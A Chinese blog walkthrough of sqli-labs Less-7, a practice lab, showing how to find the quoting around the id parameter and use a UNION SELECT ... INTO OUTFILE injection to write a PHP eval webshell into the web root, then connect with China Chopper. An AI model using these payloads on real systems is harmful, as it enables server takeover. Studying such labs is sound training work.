(1)查看PHP源代码

可以看见输入的id被一对单引号和两对圆括号包围

(2)根据提示:Dump into Outfile可知,此次攻击需要导出文件

(3)在第一关获取

@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径

?id=2' union select 1,@@datadir,@@basedir --+

(4)修改MySql配置,以让能在D盘写入文件(MySQL->my.ini)

(5)payload如下

?id=1')) union select 1,'2','<?php @eval($_POST["cmd"]);?>' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\1234.php' --+

尽管显示错误,但在所写目录里有已经写好了文件

(6)运行中国菜刀

至此,攻击完成!

转载于:https://www.cnblogs.com/momoli/p/10678048.html

SQLI DUMB SERIES-7相关推荐

  1. SQLI DUMB SERIES-8

    SQLI DUMB SERIES-8思路 ?id=1'--+ 构造闭合发现没有回显 则我们使用盲注 盲注分为几种 布尔型盲注 Length() //返回字符串长度 Substr() //取字符串 用法 ...

  2. SQLI DUMB SERIES-1-2

    安装了SQLI DUMB的题库 这些都是为了了解sql注入的方式,碰到的题目就是这样的题去找flag.现在就是去探索方法 首先我们要知道不管什么数据库注入,检测是否有注入点是第一步 第一题 1.提示输 ...

  3. SQLI DUMB SERIES-10

    第十关的步骤与第九关相同 可以查看之前的第九关打法 SQLI DUMB SERIES-9 //猜库名?id=1' and if(ascii(substr(database(),1,1))=115,sl ...

  4. SQLI DUMB SERIES-2

    SQLI DUMB SERIES-2思路 ?id=-1 union all select 1,database(),3 from users --+ ?id=-1 select 1,group_con ...

  5. SQLI DUMB SERIES-4

    ?id=1" 报错 You have an error in your SQL syntax; check the manual that corresponds to your MySQL ...

  6. SQLI DUMB SERIES-5

    less5 (1)输入单引号,回显错误,说明存在注入点.输入的Id被一对单引号所包围,可以闭合单引号 (2)输入正常时:?id=1 说明没有显示位,因此不能使用联合查询了:可以使用报错注入,有两种方式 ...

  7. SQLI DUMB SERIES-16

    (1)无论怎么输入,都没有回显,但当输入 admin")#时,显示登录成功.若通过其他方法获取数据库的用户名,可通过这个方法登录成功. (2)获取其他信息可用考虑时间延迟注入.方法同15. ...

  8. SQLI DUMB SERIES-3

    ?id=1') 构造闭合 ?id=1') --+ 注释后面内容 ?id=1') order by 4–+ 4报错 3不报错 故有3列 ?id=-1') union all select 1,2,3 f ...

  9. SQLI DUMB SERIES-1

    less-1 (1) 可以看到提示输入ID,而且less-1题目也有提到GET,因此试试以下操作: http://127.0.0.1/sqli-labs-master/Less-1/?id=1 结果: ...

最新文章

  1. 0基础玩转CV的利器绝了,还送万元礼金,机不可失!
  2. STM32-RCC内部总线时钟设置程序详讲
  3. Focal Loss和它背后的男人RetinaNet
  4. qeephp 修改acl.yaml文件实现访问控制
  5. Mapped Statements collection does not contain value for TaskMapper.selectByPrimaryKey
  6. 教育部:中小学生原则上不得将个人手机带入校园!不要相信手机对学习有帮助!
  7. 乡村要振兴,快递先进村?
  8. php单表显示动态下拉框,PHP:使用optgroup动态下拉列表
  9. Forms身份验证基本原理
  10. Anaconda 完全入门指南
  11. 【华为云技术分享】小熊派华为物联网操作系统LiteOS裸机驱动移植02-LCD驱动移植及使用
  12. 51单片机的轮胎气压监测系统_汽车的胎压监测系统有哪些作用?
  13. 2007-11-22 21:24 大端(Big Endian)与小端(Little Endian)详解
  14. python中国官网-中蟒 (中文 Python) 編程語言網站 chinesepython
  15. 肤色检测一例-使用rgb颜色模型
  16. Java JDK 配置环境变量
  17. R语言metafor包预后meta分析复现
  18. 空间变换与计算_02_3x3矩阵
  19. 使用Flurry来统计和分析用户行为
  20. 《国度》之大学者联盟全解

热门文章

  1. Java — 慎用Executors类中newFixedThreadPool()和newCachedThreadPool()
  2. Android 8.0 Activity启动流程分析
  3. 第十一周项目2--定义点类
  4. gitea 1.16.8 忘记口令的处理思路
  5. 技术狂潮下的生理性健忘:科技产品如何影响我们的大脑?
  6. Java多线程-任务拒绝策略
  7. 什么是知识,什么是知识图谱,有什么作用,有哪些应用领域?
  8. springBoot企业微信引入会话存档SDK
  9. 文件服务器 u口共享,轻松搭建专业级FTP文件共享服务器
  10. 在html5中,用于获得用户当前位置的方法